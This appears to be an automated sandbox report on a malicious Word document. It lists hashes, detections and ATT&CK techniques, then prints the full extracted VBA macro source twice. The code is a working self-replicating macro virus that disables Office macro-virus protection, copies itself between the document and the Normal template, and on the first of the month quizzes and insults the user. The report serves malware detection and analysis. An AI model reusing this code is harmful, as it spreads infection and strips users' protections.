Office (OLE) malware analysis — malicious · ab8044b700521412

MALICIOUS

Office (OLE)

46.0 KB Created: 2014-09-19 02:57:00 Authoring application: Microsoft Office Word First seen: 2014-10-14

MD5: 506572aff5caf1a84f028d68f0667a39 SHA-1: 365f45730c79c3542679a8fc564c68eca7069fc6 SHA-256: ab8044b700521412ef369a8f36ffeeccaa555544d2594bea6ea0c3aef004fc7d

150 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The macros are designed to disable macro virus protection and replicate themselves to the Normal template, indicating a self-propagation or persistence mechanism. The heuristic firings and script behavior suggest this is a macro-based threat, likely delivered as a spearphishing attachment.

Heuristics 5

ClamAV: Doc.Trojan.Bptk-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Bptk-2
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
Options.VirusProtection = False
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3307 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3307 bytes
SHA-256: `6f2d80473bb19b94d68bab85120d8406847b6a042e7776c43e3523d5b7877108`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Dim DI As Boolean, TI As Boolean, d As Object, t As Object, Src As String, r As String Private Sub Document_Close() On Error Resume Next Set d = ActiveDocument.VBProject.VBComponents.Item(1) Set t = NormalTemplate.VBProject.VBComponents.Item(1) DI = d.CodeModule.Find("长安公司汽研所常识课", 1, 1, 10000, 10000) TI = t.CodeModule.Find("长安公司汽研所常识课", 1, 1, 10000, 10000) Options.VirusProtection = False If DI And Not (TI) Then Src = d.CodeModule.Lines(1, d.CodeModule.CountOfLines) t.CodeModule.DeleteLines 1, t.CodeModule.CountOfLines t.CodeModule.AddFromString Src NormalTemplate.Save ElseIf TI And Not (DI) Then If Day(Now()) = 1 Then Do r = UCase(InputBox("长安之星车长多少米?" & Chr(13) & Chr(13) _ & "A.3米4 B.3米5 C.3米55 D.3米7" & Chr(13) & Chr(13) _ & "要好好思考哟!", "紧急提问")) Loop Until r <> "" If r = "B" Then MsgBox "好棒哟!" GoTo 10 Else MsgBox "唉!再给你一次机会." Do r = UCase(InputBox("长安之星FBA是什么型?" & Chr(13) & Chr(13) _ & "A.标准型 B.普通型 C.豪华型" & Chr(13) & Chr(13) _ & "想好了再回答!", "紧急提问")) Loop Until r <> "" If r = "C" Then MsgBox "谢谢你的支持!" GoTo 10 Else MsgBox "笨蛋!给你最后一次机会." Do r = UCase(InputBox("安全气囊是干什么用的?" & Chr(13) & Chr(13) _ & "A.防止撞车 B.防止侧滑 C.撞车时保护驾驶员" & Chr(13) & Chr(13) _ & "这是最后一次机会哟!", "紧急提问")) Loop Until r <> "" If r = "C" Then MsgBox "总算答对了!" GoTo 10 Else MsgBox "看来你还需要对长安之星多加了解..." ActiveDocument.SaveAs "c:\lzc.vxd" ActiveDocument.Close Exit Sub End If End If End If End If 10: Src = t.CodeModule.Lines(1, t.CodeModule.CountOfLines) d.CodeModule.DeleteLines 1, d.CodeModule.CountOfLines d.CodeModule.AddFromString Src ActiveDocument.Save End If End Sub Private Sub Document_Open() On Error Resume Next Set d = ActiveDocument.VBProject.VBComponents.Item(1) Set t = NormalTemplate.VBProject.VBComponents.Item(1) DI = d.CodeModule.Find("长安公司汽研所常识课", 1, 1, 10000, 10000) TI = t.CodeModule.Find("长安公司汽研所常识课", 1, 1, 10000, 10000) Options.VirusProtection = False If DI And Not (TI) Then t.CodeModule.DeleteLines 1, t.CodeModule.CountOfLines ElseIf TI And Not (DI) Then d.CodeModule.DeleteLines 1, d.CodeModule.CountOfLines End If End Sub

SHA-256: 6f2d80473bb19b94d68bab85120d8406847b6a042e7776c43e3523d5b7877108

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True



Dim DI As Boolean, TI As Boolean, d As Object, t As Object, Src As String, r As String


Private Sub Document_Close()
On Error Resume Next

Set d = ActiveDocument.VBProject.VBComponents.Item(1)
Set t = NormalTemplate.VBProject.VBComponents.Item(1)

DI = d.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)
TI = t.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)

Options.VirusProtection = False

  If DI And Not (TI) Then
    Src = d.CodeModule.Lines(1, d.CodeModule.CountOfLines)
    t.CodeModule.DeleteLines 1, t.CodeModule.CountOfLines
    t.CodeModule.AddFromString Src
    NormalTemplate.Save
    
  ElseIf TI And Not (DI) Then
If Day(Now()) = 1 Then
 Do
 r = UCase(InputBox("长安之星车长多少米?" & Chr(13) & Chr(13) _
 & "A.3米4  B.3米5  C.3米55  D.3米7" & Chr(13) & Chr(13) _
 & "要好好思考哟!", "紧急提问"))
 Loop Until r <> ""
 If r = "B" Then
   MsgBox "好棒哟!"
   GoTo 10
 Else
   MsgBox "唉!再给你一次机会."
    Do
     r = UCase(InputBox("长安之星FBA是什么型?" & Chr(13) & Chr(13) _
     & "A.标准型  B.普通型  C.豪华型" & Chr(13) & Chr(13) _
     & "想好了再回答!", "紧急提问"))
    Loop Until r <> ""
      If r = "C" Then
        MsgBox "谢谢你的支持!"
        GoTo 10
      Else
        MsgBox "笨蛋!给你最后一次机会."
          Do
           r = UCase(InputBox("安全气囊是干什么用的?" & Chr(13) & Chr(13) _
           & "A.防止撞车  B.防止侧滑  C.撞车时保护驾驶员" & Chr(13) & Chr(13) _
           & "这是最后一次机会哟!", "紧急提问"))
          Loop Until r <> ""
           If r = "C" Then
             MsgBox "总算答对了!"
             GoTo 10
           Else
             MsgBox "看来你还需要对长安之星多加了解..."
             ActiveDocument.SaveAs "c:\lzc.vxd"
             ActiveDocument.Close
             Exit Sub
           End If
      End If
 End If
End If
10:
    Src = t.CodeModule.Lines(1, t.CodeModule.CountOfLines)
    d.CodeModule.DeleteLines 1, d.CodeModule.CountOfLines
    d.CodeModule.AddFromString Src
    ActiveDocument.Save
      
  End If


End Sub

Private Sub Document_Open()
On Error Resume Next

Set d = ActiveDocument.VBProject.VBComponents.Item(1)
Set t = NormalTemplate.VBProject.VBComponents.Item(1)

DI = d.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)
TI = t.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)

Options.VirusProtection = False

  If DI And Not (TI) Then
    t.CodeModule.DeleteLines 1, t.CodeModule.CountOfLines
    
  ElseIf TI And Not (DI) Then
    d.CodeModule.DeleteLines 1, d.CodeModule.CountOfLines
      
  End If
  
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.